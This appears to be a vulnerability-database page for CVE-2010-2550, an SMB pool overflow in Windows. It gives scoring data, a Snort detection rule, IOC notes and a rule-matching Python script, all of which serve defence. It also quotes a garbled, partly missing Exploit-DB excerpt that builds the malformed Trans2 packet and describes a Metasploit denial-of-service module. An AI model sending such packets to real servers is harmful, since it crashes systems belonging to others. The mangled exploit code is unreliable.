CVE-2010-2550
Published 2010-08-11
Priority: P2 · 75 · critical. CVSS 2.0 base score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C).
Exploit available. EPSS: 75.72% (99.5th percentile).
The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate fields in an SMB request, which allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability."
Detection & IOCs (extracted from sources)
Command: Trans2 QUERY_FS_INFO, Query FS Attribute Info, with zero-size pool allocation (SMB command 0x32, subcommand 0x0003)
Snort rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow"; flow:established,to_server; content:"|ff 53 4d 42 32|"; offset:4; depth:5; content:"|00 00 00 00|"; within:4; content:"|00 00|"; distance:30; within:2; content:"|00 03 00|"; distance:19; within:3; reference:url,www.exploit-db.com/exploits/14607/; reference:url,seclists.org/fulldisclosure/2010/Aug/122; reference:cve,2010-2550; reference:bid,42224; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-054.mspx; classtype:attempted-user; sid:2012094; rev:4; metadata:created_at 2010_12_23, cve CVE_2010_2550, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06;)
Bytes: |ff 53 4d 42 32|
Bytes: \xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8
- Detect malicious SMB Trans2 QUERY_FS_ATTRIBUTE_INFO requests by matching the SMB header byte sequence |ff 53 4d 42 32| (the "\xffSMB" signature followed by the Trans2 command 0x32) at offset 4 (depth 5) on TCP port 445, followed by |00 00 00 00| within 4 bytes, |00 00| at distance 30, and |00 03 00| at distance 19; the |00 00| at distance 30 is the zero MaxDataCount field that triggers the zero-size pool allocation, and |00 03 00| covers the Trans2 subcommand 0x0003.
- The exploit targets SRV.SYS via the SrvSmbQueryFsInformation code path. Monitor for unexpected crashes or pool corruption events in SRV.SYS on Windows SMB servers as a host-based indicator.
- Exploitation may occur without authentication if a guest-accessible SMB share exists. Audit shares for guest/anonymous read access as a risk-reduction and detection-scoping measure.
- Authentication is normally required to reach the vulnerable code path; unauthenticated exploitation is only possible when a guest-readable share is present.
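To make the Snort rule's four content matches concrete, the following matcher (an added example written for this page, not the rule author's or any vendor's code) applies the rule's offset/depth/distance/within windows to a constructed SMB_COM_TRANSACTION2 request that is built field by field, so you can see which header and parameter-word fields each pattern lands on. The packet builder, its dummy TID/PID/UID/MID values and the field layout are assumptions based on the standard Trans2 request format, not captured traffic.

```python
import struct

# The ET rule's content steps for CVE-2010-2550 (sid 2012094), as
# (pattern, offset, depth, distance, within). Absolute steps use offset/depth;
# relative steps use distance/within measured from the end of the previous match.
RULE_STEPS = [
    (b"\xff\x53\x4d\x42\x32", 4, 5, None, None),  # "\xffSMB" + command 0x32 (Trans2)
    (b"\x00\x00\x00\x00", None, None, None, 4),  # NT status field == 0
    (b"\x00\x00", None, None, 30, 2),            # MaxDataCount == 0 (the zero-size pool alloc)
    (b"\x00\x03\x00", None, None, 19, 3),        # reserved3 byte + Setup[0] == 0x0003 QUERY_FS_INFORMATION
]

def match_rule(payload: bytes) -> bool:
    """Apply the rule's content steps to one TCP payload (NetBIOS session header included)."""
    cursor = 0  # end of the previous match
    for pattern, offset, depth, distance, within in RULE_STEPS:
        if offset is not None:
            start, end = offset, offset + depth            # absolute window
        else:
            start = cursor + (distance or 0)
            end = start + within                           # relative window
        idx = payload[start:end].find(pattern)
        if idx < 0:
            return False
        cursor = start + idx + len(pattern)
    return True

def build_trans2_request(max_data_count: int, setup: int) -> bytes:
    """Constructed SMB_COM_TRANSACTION2 request (assumed layout, not captured traffic)."""
    hdr = b"\xffSMB" + bytes([0x32]) + struct.pack("<I", 0)       # magic, command, NT status
    hdr += b"\x00" + struct.pack("<H", 0) + struct.pack("<H", 0)  # flags, flags2, PIDHigh
    hdr += b"\x00" * 8 + b"\x00" * 2                               # signature, reserved
    hdr += struct.pack("<HHHH", 1, 2, 3, 4)                        # TID, PID, UID, MID (dummy)
    words = struct.pack(
        "<BHHHHBBHIHHHHHBB",
        15,              # WordCount
        2, 0,            # TotalParameterCount, TotalDataCount
        0,               # MaxParameterCount
        max_data_count,  # MaxDataCount (payload bytes 43-44: the rule's third match)
        0, 0,            # MaxSetupCount, reserved
        0,               # Flags
        0,               # Timeout
        0,               # reserved2
        2, 68,           # ParameterCount, ParameterOffset
        0, 70,           # DataCount, DataOffset
        1, 0,            # SetupCount, reserved3 (payload byte 64)
    ) + struct.pack("<H", setup)     # Setup[0]: Trans2 subcommand (payload bytes 65-66)
    body = hdr + words + struct.pack("<H", 0)  # empty ByteCount; fields after Setup are not matched
    return struct.pack(">I", len(body)) + body  # NetBIOS session header, then the SMB message
```

A request with a non-zero MaxDataCount or a different Trans2 subcommand does not match, which is why the rule keys on those two fields rather than on the Trans2 command alone.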
Suricata
ET NETBIOS SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow (suricata, 2010-12-23, CVE-2010-2550)
Rule: the same sid 2012094 signature reproduced in the Detection & IOCs section above.
Exploit-DB
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054) (exploitdb, 2010-08-10, CVE-2010-2550)
---
#!/usr/bin/env python
import sys,struct,socket
from socket import *
if len(sys.argv)i", len(sharename))[3:4]+sharename
print "[+]Session Query sent"
return struct.pack(">i", len(packetsession))+packetsession
##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info
if data[8:10] == "\x73\x00":
packetrans = "\x00\x00\x00\x46"
packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"
packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00"
packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"
packetrans += "\x00\x00\x44\x20\x05\x01"
print "[+]Malformed Trans2 packet sent
Metasploit
Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
This module exploits a denial of service flaw in the Microsoft Windows SMB service on versions of Windows prior to the August 2010 Patch Tuesday. To trigger this bug, you must be able to access a share with at least read privileges. That generally means you will need authentication. However, if a system has a guest accessible share, you can trigger it without any authentication.
No writeups or analysis indexed.
References:
- http://www.us-cert.gov/cas/techalerts/TA10-222A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-054
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11106